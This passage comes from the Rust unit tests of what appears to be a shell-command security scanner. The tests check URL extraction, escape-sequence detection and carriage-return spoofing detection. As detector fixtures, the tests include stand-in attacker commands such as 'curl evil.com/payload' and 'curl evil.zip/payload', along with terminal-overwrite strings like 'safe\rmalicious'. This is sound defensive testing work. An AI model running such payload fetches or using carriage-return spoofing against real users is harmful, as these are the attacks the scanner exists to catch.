1109        let result = scan_bytes(input);
1110        assert!(result.has_ansi_escapes);
1111
1112        // DCS: \eP
1113        let input = b"hello\x1bPdataworld";
1114        let result = scan_bytes(input);
1115        assert!(result.has_ansi_escapes);
1116    }
1117
1118    #[test]
1119    fn test_schemeless_long_tld() {
1120        assert!(looks_like_schemeless_host("example.academy"));
1121        assert!(looks_like_schemeless_host("example.photography"));
1122    }
1123
1124    #[test]
1125    fn test_segment_index_correct() {
1126        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1127        // Each URL should have the segment index of the segment it came from
1128        for url in &urls {
1129            // segment_index should be 0 or 1, not an incrementing counter
1130            assert!(url.segment_index <= 1);
1131        }
1132    }
1133
1134    #[test]
1135    fn test_docker_build_context_not_image() {
1136        let urls = extract_urls("docker build .", ShellType::Posix);
1137        let docker_urls: Vec<_> = urls
1138            .iter()
1139            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1140            .collect();
1141        assert_eq!(
1142            docker_urls.len(),
1143            0,
1144            "build context '.' should not be treated as image"
1145        );
1146    }
1147
1148    #[test]
1149    fn test_docker_image_subcmd() {
1150        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1151        let docker_urls: Vec<_> = urls
1152            .iter()
1153            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1154            .collect();
1155        assert_eq!(docker_urls.len(), 1);
1156    }
1157
1158    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
1159    /// that all generated fragment counts are positive.
1160    /// This is a module boundary enforcement test — ensures no secret
1161    /// extractors exist outside the declarative pattern table.
1162    #[test]
1163    fn test_tier1_module_boundary_enforcement() {
1164        // Verify extractor IDs are generated
1165        let ids = tier1_generated::EXTRACTOR_IDS;
1166        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1167        // Verify exec and paste fragment counts
1168        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1169        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1170        assert!(exec_count > 0, "Must have exec fragments");
1171        assert!(
1172            paste_count >= exec_count,
1173            "Paste fragments must be superset of exec fragments"
1174        );
1175        // Verify the generated patterns are valid regexes
1176        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1177            .expect("Generated exec pattern must be valid regex");
1178        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1179            .expect("Generated paste pattern must be valid regex");
1180    }
1181
1182    // ─── CR normalization tests ───
1183
1184    #[test]
1185    fn test_scan_bytes_trailing_cr_not_flagged() {
1186        let result = scan_bytes(b"/path\r");
1187        assert!(
1188            !result.has_control_chars,
1189            "trailing \\r should not be flagged"
1190        );
1191    }
1192
1193    #[test]
1194    fn test_scan_bytes_trailing_crlf_not_flagged() {
1195        let result = scan_bytes(b"/path\r\n");
1196        assert!(
1197            !result.has_control_chars,
1198            "trailing \\r\\n should not be flagged"
1199        );
1200    }
1201
1202    #[test]
1203    fn test_scan_bytes_windows_multiline_not_flagged() {
1204        let result = scan_bytes(b"line1\r\nline2\r\n");
1205        assert!(
1206            !result.has_control_chars,
1207            "Windows \\r\\n line endings should not be flagged"
1208        );
1209    }
1210
1211    #[test]
1212    fn test_scan_bytes_embedded_cr_still_flagged() {
1213        let result = scan_bytes(b"safe\rmalicious");
1214        assert!(
1215            result.has_control_chars,
1216            "embedded \\r before non-\\n should be flagged"
1217        );
1218    }
1219
1220    #[test]
1221    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1222        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1223        assert!(
1224            result.has_control_chars,
1225            "attack \\r mixed with \\r\\n should be flagged"
1226        );
1227    }
1228
1229    #[test]
1230    fn test_scan_bytes_only_cr() {
1231        let result = scan_bytes(b"\r");
1232        assert!(
1233            !result.has_control_chars,
1234            "lone trailing \\r should not be flagged"
1235        );
1236    }
1237
1238    #[test]
1239    fn test_schemeless_skip_curl_output_flag() {
1240        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1241        // Should NOT have schemeless URL for lenna.png
1242        let schemeless: Vec<_> = urls
1243            .iter()
1244            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1245            .collect();
1246        assert!(
1247            schemeless.is_empty(),
1248            "lenna.png should not be detected as schemeless URL"
1249        );
1250    }
1251
1252    #[test]
1253    fn test_schemeless_skip_curl_output_combined() {
1254        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1255        let schemeless: Vec<_> = urls
1256            .iter()
1257            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1258            .collect();
1259        assert!(
1260            schemeless.is_empty(),
1261            "-olenna.png should not be detected as schemeless URL"
1262        );
1263    }
1264
1265    #[test]
1266    fn test_schemeless_skip_wget_output_flag() {
1267        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1268        let schemeless: Vec<_> = urls
1269            .iter()
1270            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1271            .collect();
1272        assert!(
1273            schemeless.is_empty(),
1274            "output.html should not be detected as schemeless URL"
1275        );
1276    }
1277
1278    #[test]
1279    fn test_schemeless_skip_wget_combined() {
1280        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1281        let schemeless: Vec<_> = urls
1282            .iter()
1283            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1284            .collect();
1285        assert!(
1286            schemeless.is_empty(),
1287            "-Ooutput.html should not be detected as schemeless URL"
1288        );
1289    }
1290
1291    #[test]
1292    fn test_schemeless_real_domain_still_detected() {
1293        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
1294        let schemeless: Vec<_> = urls
1295            .iter()
1296            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1297            .collect();
1298        assert!(
1299            !schemeless.is_empty(),
1300            "evil.com/payload should be detected as schemeless URL"
1301        );
1302    }
1303
1304    #[test]
1305    fn test_schemeless_png_no_slash_is_file() {
1306        assert!(!looks_like_schemeless_host("lenna.png"));
1307    }
1308
1309    #[test]
1310    fn test_schemeless_tld_overlap_with_path_is_domain() {
1311        // evil.zip/payload has a path component, so the .zip extension heuristic
1312        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
1313        assert!(looks_like_schemeless_host("evil.zip/payload"));
1314        assert!(looks_like_schemeless_host("evil.sh/payload"));
1315    }
1316
1317    #[test]
1318    fn test_schemeless_tld_overlap_without_path_is_file() {
1319        // Without a path, lenna.zip / script.sh look like filenames, not domains.
1320        assert!(!looks_like_schemeless_host("lenna.zip"));
1321        assert!(!looks_like_schemeless_host("script.sh"));
1322    }
1323
1324    #[test]
1325    fn test_schemeless_tld_overlap_sink_context_detected() {
1326        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
1327        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
1328        let schemeless: Vec<_> = urls
1329            .iter()
1330            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1331            .collect();
1332        assert!(
1333            !schemeless.is_empty(),
1334            "evil.zip/payload should be detected as schemeless URL in sink context"
1335        );
1336    }
1337}
tirith_core/extract.rs

tirith_core/
extract.rs